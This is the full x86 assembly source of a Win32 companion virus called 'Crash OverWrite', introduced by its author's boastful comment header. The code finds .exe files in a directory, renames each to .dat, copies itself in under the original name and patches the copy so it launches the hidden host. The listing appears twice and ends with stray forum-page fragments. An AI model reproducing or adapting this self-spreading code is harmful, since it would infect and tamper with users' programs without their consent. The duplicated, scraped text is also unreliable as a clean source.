comment *
Name: Crash OverWrite :-)
Coder: BeLiAL
Type: Companion
Anything else: NO
This is my first win32 virus.Its only a
companionvirus but it does his work very
well.Its perhaps coded not so fine but
im sure nobody will care.It infects all
files in the directory and renames
the victimfile to .dat .Perhaps i will make
infecting more files...
Its without payload and any weapons :)
It Doesnt infect dos-files correctly.
Greetings to the whole #vx channel on undernet
BeLiAL
*
.386
.model flat
Locals
Jumps
Extrn FindFirstFileA :PROC
Extrn FindNextFileA :PROC
Extrn CreateFileA :PROC
Extrn WriteFile :PROC
Extrn ReadFile :PROC
Extrn GlobalAlloc :PROC
Extrn GlobalFree :PROC
Extrn ExitProcess :PROC
Extrn WinExec :PROC
Extrn CopyFileA :PROC
Extrn CloseHandle :PROC
Extrn SetFilePointer :PROC
Extrn GetFileSize :PROC
.data
MAX_PATH EQU 0ffh
FALSE EQU 0
changeoffset EQU 094fh
winsize EQU 01h
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
memptr dd 0
counter1 dd 0
filehandle dd 0
filesize dd 00001000h
exefile db '*.exe',0
myname db 'crashoverwrite.exe',0
dd 0
dd 0
secbuffer dd 0
dd 0
dd 0
searchhandle dd 0
db '[Crash OverWrite] coded by BeLiAL'
.code
start:
push offset FindFileData
push offset exefile
call FindFirstFileA
mov searchhandle,eax
already_infected:
mov eax,dword ptr nFileSizeLow.FindFileData
cmp eax,00001000h
je find_next_victim
mov eax,offset cFileName.FindFileData
jmp find_dot1
find_next_victim:
push offset FindFileData
push searchhandle
call FindNextFileA
test eax,eax
jz reanimate
jmp already_infected
find_dot1:
cmp byte ptr ds:[eax],'.'
je next_step1
add eax,1
jmp find_dot1
next_step1:
add eax,1
push eax
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
mov ebx,offset cFileName.FindFileData
mov eax,offset secbuffer
find_dot2:
mov dh,byte ptr ds:[ebx]
cmp edx,0
je next_step2
mov byte ptr ds:[eax],dh
add ebx,1
add eax,1
jmp find_dot2
next_step2:
pop eax
push FALSE
push offset secbuffer
mov byte ptr ds:[eax],'e'
add eax,1
mov byte ptr ds:[eax],'x'
add eax,1
mov byte ptr ds:[eax],'e'
push offset cFileName.FindFileData
call CopyFileA
push FALSE
push offset cFileName.FindFileData
push offset myname
call CopyFileA
open_victim:
push 0
push 080h
push 3h
push 0h
push 0h
push 0c0000000h
push offset FindFileData.cFileName
Call CreateFileA
mov filehandle,eax
cmp eax,0ffffffffh
je find_next_victim
getmemory:
push filesize
push 0
Call GlobalAlloc ;get the memory
mov edx,eax
cmp eax,0
je close_file
push edx
copyinmemory:
push 0
push offset counter1
push filesize
push edx
push filehandle
Call ReadFile
pop edx
mov dword ptr memptr,edx ;for later use
add edx,changeoffset
mov eax,offset cFileName.FindFileData
modify_victim:
mov bh,byte ptr ds:[eax]
mov byte ptr ds:[edx],bh
cmp bh,0
je set_pointer
add eax,1
add edx,1
jmp modify_victim
set_pointer:
push 0
push 0
push 0
push filehandle
call SetFilePointer
copy_to_file:
push 0
push offset counter1
push filesize
push memptr
push filehandle
call WriteFile
close_file:
push filehandle
call CloseHandle
jmp find_next_victim
reanimate:
mov eax,offset myname
find_dot3:
mov bx,word ptr ds:[eax]
cmp bx,'e.'
je next_step3
cmp bx,'E.'
je next_step3
add eax,1
jmp find_dot3
next_step3:
add eax,1
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
add eax,1
mov byte ptr ds:[eax],00h
that_was_all:
push winsize
push offset myname
call WinExec
final:
push 0
call ExitProcess
ends
end start
Name: Crash OverWrite :-)
Coder: BeLiAL
Type: Companion
Anything else: NO
This is my first win32 virus.Its only a
companionvirus but it does his work very
well.Its perhaps coded not so fine but
im sure nobody will care.It infects all
files in the directory and renames
the victimfile to .dat .Perhaps i will make
infecting more files...
Its without payload and any weapons :)
It Doesnt infect dos-files correctly.
Greetings to the whole #vx channel on undernet
BeLiAL
*
.386
.model flat
Locals
Jumps
Extrn FindFirstFileA :PROC
Extrn FindNextFileA :PROC
Extrn CreateFileA :PROC
Extrn WriteFile :PROC
Extrn ReadFile :PROC
Extrn GlobalAlloc :PROC
Extrn GlobalFree :PROC
Extrn ExitProcess :PROC
Extrn WinExec :PROC
Extrn CopyFileA :PROC
Extrn CloseHandle :PROC
Extrn SetFilePointer :PROC
Extrn GetFileSize :PROC
.data
MAX_PATH EQU 0ffh
FALSE EQU 0
changeoffset EQU 094fh
winsize EQU 01h
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
memptr dd 0
counter1 dd 0
filehandle dd 0
filesize dd 00001000h
exefile db '*.exe',0
myname db 'crashoverwrite.exe',0
dd 0
dd 0
secbuffer dd 0
dd 0
dd 0
searchhandle dd 0
db '[Crash OverWrite] coded by BeLiAL'
.code
start:
push offset FindFileData
push offset exefile
call FindFirstFileA
mov searchhandle,eax
already_infected:
mov eax,dword ptr nFileSizeLow.FindFileData
cmp eax,00001000h
je find_next_victim
mov eax,offset cFileName.FindFileData
jmp find_dot1
find_next_victim:
push offset FindFileData
push searchhandle
call FindNextFileA
test eax,eax
jz reanimate
jmp already_infected
find_dot1:
cmp byte ptr ds:[eax],'.'
je next_step1
add eax,1
jmp find_dot1
next_step1:
add eax,1
push eax
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
mov ebx,offset cFileName.FindFileData
mov eax,offset secbuffer
find_dot2:
mov dh,byte ptr ds:[ebx]
cmp edx,0
je next_step2
mov byte ptr ds:[eax],dh
add ebx,1
add eax,1
jmp find_dot2
next_step2:
pop eax
push FALSE
push offset secbuffer
mov byte ptr ds:[eax],'e'
add eax,1
mov byte ptr ds:[eax],'x'
add eax,1
mov byte ptr ds:[eax],'e'
push offset cFileName.FindFileData
call CopyFileA
push FALSE
push offset cFileName.FindFileData
push offset myname
call CopyFileA
open_victim:
push 0
push 080h
push 3h
push 0h
push 0h
push 0c0000000h
push offset FindFileData.cFileName
Call CreateFileA
mov filehandle,eax
cmp eax,0ffffffffh
je find_next_victim
getmemory:
push filesize
push 0
Call GlobalAlloc ;get the memory
mov edx,eax
cmp eax,0
je close_file
push edx
copyinmemory:
push 0
push offset counter1
push filesize
push edx
push filehandle
Call ReadFile
pop edx
mov dword ptr memptr,edx ;for later use
add edx,changeoffset
mov eax,offset cFileName.FindFileData
modify_victim:
mov bh,byte ptr ds:[eax]
mov byte ptr ds:[edx],bh
cmp bh,0
je set_pointer
add eax,1
add edx,1
jmp modify_victim
set_pointer:
push 0
push 0
push 0
push filehandle
call SetFilePointer
copy_to_file:
push 0
push offset counter1
push filesize
push memptr
push filehandle
call WriteFile
close_file:
push filehandle
call CloseHandle
jmp find_next_victim
reanimate:
mov eax,offset myname
find_dot3:
mov bx,word ptr ds:[eax]
cmp bx,'e.'
je next_step3
cmp bx,'E.'
je next_step3
add eax,1
jmp find_dot3
next_step3:
add eax,1
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
add eax,1
mov byte ptr ds:[eax],00h
that_was_all:
push winsize
push offset myname
call WinExec
final:
push 0
call ExitProcess
ends
end start
146
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
